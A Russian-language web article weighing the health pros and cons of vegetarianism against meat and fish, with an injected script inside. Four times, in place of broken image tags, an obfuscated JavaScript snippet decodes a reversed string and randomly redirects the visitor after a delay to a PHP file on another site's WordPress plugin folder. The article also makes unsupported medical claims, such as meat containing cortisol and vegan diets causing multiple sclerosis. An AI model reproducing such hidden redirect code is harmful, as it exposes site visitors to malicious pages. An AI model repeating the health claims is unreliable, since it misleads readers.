Плюсы и минусы вегетарианства: мнение медиков

В последние годы достаточно активно набирает популярность среди людей различных возрастных групп полный или частичный отказ от продуктов питания животного происхождения. Такой принцип питания, называемый вегетарианством, распространен во многих странах, в том числе и у нас. Некоторые считают, что это явление является своеобразной философией, способной принести пользу и оздоровить организм. Однако большое количество людей в корне не согласны с таким утверждением и наоборот утверждают, что вегетарианство вредно для человека. По мнению врачей, правда находится где-то посередине и к каждому отдельному случаю следует подходить индивидуально.

Статистические данные показывают, что в мире поддерживают вегетарианство в той или иной степени порядка 5-10 процентов населения. Большинство из этих людей проживает на территории Индии, где отказ от мяса происходит по религиозным соображениям. Меньше всего вегетарианцев насчитывается в Китае.

Немного общей информации 

Диетологи условно подразделяют вегетарианство на несколько групп, в зависимости от того, по каким причинам человек отказался от привычной пищи и какие продукты употребляет. Такое деление позволяет более четко выявить отрицательные и положительные моменты этой своеобразной диеты. Следует помнить, что снижение аминокислот в организме, которые в основном вырабатываются из мяса, сильно сказывается на здоровье и влияет на внешний вид человека. Конечно, свинину или говядину можно попробовать компенсировать другими продуктами, однако не всегда такая замена равноценна.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/razdelannaya_tusha_1-728×546.jpg» alt=»разделанные туши» width=»728″ height=»546″ /> Главный «козырь» вегетарианцев — нежелание есть убитых животных, но в первую очередь стоит обратить внимание на собственное здоровье

Следует помнить и об опасности вегетарианства для детей и людей преклонного возраста. Растущий организм ребенка постоянно активно развивается и должен получать все необходимые элементы и витамины в достаточном количестве. В противном случае могут развиться многие опасные заболевания, со временем переходящие в хронические. У людей пожилого возраста, наоборот, в организме происходят значительные изменения, которые влияют на ухудшение работы внутренних органов. Восполнить потребности в полезных микроэлементах вегетарианской пищей просто невозможно.

Ученые из Саусгемптоновского университета в Великобритании в результате проведенных исследований сделали вывод, что чем больше у людей уровень IQ, тем выше у них предрасположенность к вегетарианству. 

Мясо и вегетарианство

Употребление мяса в пищу принято считать естественным процессом и специалисты не рекомендуют исключать из рациона этот продукт. Именно в нем содержится целый комплекс самых разных аминокислот. Свинина, говядина и баранина питают организм витамином D, а также всей группой витаминов категории B. Человек, который регулярно питается мясом не склонен жаловаться на хрупкость костей и не испытывает проблем с нервной системой. Также этот продукт содержит в себе невероятное количество фосфора, калия, цинка. В его состав входят такие необходимые элементы, как йод и железо.

Наличие в мясе всевозможных минералов, белков, а также витаминов, дополняется и содержанием особых веществ, которые способны усиливать выделение столь необходимых организму пищеварительных соков. Это помогает значительно облегчить процесс переработки еды, а соответственно и улучшить работу кишечника. Стоит отметить, что все эти достоинства относятся только к натуральному мясу. В отношении полуфабрикатов можно сказать, что они практически не приносят пользу организму, так как насыщены жиром и калориями.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/image003.png» alt=»Полуфабрикаты» width=»604″ height=»483″ /> Стоит отметить, что пользу приносит только натуральное мясо, а не полуфабрикаты

В любом мясе содержится достаточно много холестерина, а это, как правило, сильно сказывается на работе щитовидной железы. Кроме этого, употребление мяса может привести к развитию атеросклероза, а также повлиять на печень. В пользу отказа от мяса говорят и современные методы его производства. Для того чтобы уберечь животных от болезней и способствовать их активному набору веса, практически все производители используют различные антибиотики, гормоны и другие вредные вещества. Эти элементы никуда не исчезают из мяса даже при его термической обработке и в полном объеме попадают в человеческий организм.

Тот, кто регулярно употребляет мясо, более всего подвержен к набору лишнего веса. Все это напрямую связано с содержанием в этом продукте в большом количестве кортизола. Также, употребление мясных блюд может отрицательно сказаться и на гормональной системе. Это происходит за счет того, что в организм попадает большое количество чужих гормон непосредственно от животного.

Роль рыбы в рационе человека

Невозможно нормально сбалансировать питание без регулярного употребления белков животного происхождения. Если полное исключение из пищи мяса можно заменить включением в рацион молока, творога, а также яиц и грибов, то компенсировать потерю железа этими растительными продуктами практически невозможно. В этом случае на первый план выходит регулярное употребление птицы и рыбы.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/image005.png» alt=»Жареная рыба» width=»640″ height=»480″ /> Если всё же принято решение об отказе от мяса, в рационе должна остаться рыба

Врачи утверждают, что переход на лактоововегетарианство положительно сказывается на тех людях, которые страдают от атеросклероза, мочекаменной болезни, ожирения, сахарного диабета, а также некоторых заболеваний печени.

Во всех морепродуктах содержится в достаточном количестве селен, который приводит в тонус все кровеносные сосуды. Кроме этого, любая рыба богата полиненасыщенными жирными кислотами, такими как омега-6 и омега-3, отвечающими за регулирование в крови холестерина. Также этот продукт помогает укрепить иммунитет и снизить риск возникновения многих онкологических заболеваний. Если в рационе вегетарианца регулярно присутствуют блюда из рыбы или птицы, то можно сказать об отсутствии минусов в этой диете.

Плюсы строгого вегетарианства 

Та категория вегетарианцев, которая из своего рациона полностью исключила блюда из продуктов животного происхождения, старается употреблять в пищу много растительной клетчатки, а именно овощей и фруктов. Они оказывают хорошую стимуляцию перистальтики кишечника, а кроме этого во всем пищеварительном тракте поддерживают необходимый баланс микрофлоры. Овощи и фрукты, за счет содержания в достаточном количестве фитонцидов, способны убивать различные вредные бактерии, а также подавлять в кишечнике развивающиеся процессы гниения. Кроме этого в этих продуктах находится огромное количество углеводов, а они, как известно, являются основным источником энергии.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/image007-728×546.png» alt=»Овощи и фрукты» width=»728″ height=»546″ /> Овощи и фрукты богаты углеводами, стимулируют работу кишечника и убивают бактерии

В большинстве своем люди, которые полностью отказываются от употребления продуктов животного происхождения, меньше всего подвержены гипертонии. У них снижается риск возникновения в желудочном пузыре и почках камней. Организм человека питающегося исключительно овощами и фруктами, меньше всего насыщен вредным холестерином и шлаками. Такие натуральные продукты эффективно очищают кровь.

Отрицательная сторона отказа от продуктов животного происхождения

Несмотря на огромную пользу от употребления овощей, фруктов, а также различных круп и орехов, обеспечить организм человека всем необходимым набором веществ они просто не в состоянии. Врачи-диетологи крайне отрицательно относятся к полному отказу от употребления продуктов животного происхождения. Употребление в пищу только растительных продуктов дает чувство насыщения на непродолжительный период времени. Человек начинает гораздо чаще питаться и если на фигуре это никак не сказывается, то для пищеварительных органов играет отрицательную роль.

Вегетарианцы, которые исключили из своего рациона не только мясо, но и яйца с молоком, испытывают сильную потребность в витамине B2. Большинство этих людей страдает от нехватки таких необходимых витаминов, как B12 и D. Все это рано или поздно неизбежно приведет к проблемам с психикой и различным нервным расстройствам. Со временем может развиться рассеянный склероз и ряд других серьезных заболеваний. У вегетарианцев в организме наблюдается сильная нехватка железа и различных минеральных компонентов. «вставить видео «вегетарианство за и против»

Видео: вегетарианство — за и против

Многие диетологи уверены, что вегетарианство это не наука, а простая идеология. Если вред от такой диеты для взрослого и здорового человека можно свести к минимуму, то для детей, женщин в положении и стариков такое питание может быть опасным для жизни. Следует отметить и то, что некоторые элементы вегетарианства положительно сказываются на организме в целом. Не стоит полностью исключать из своего рациона продукты животного происхождения. Ко всему следует подходить рационально и без фанатизма.

Adblock
detector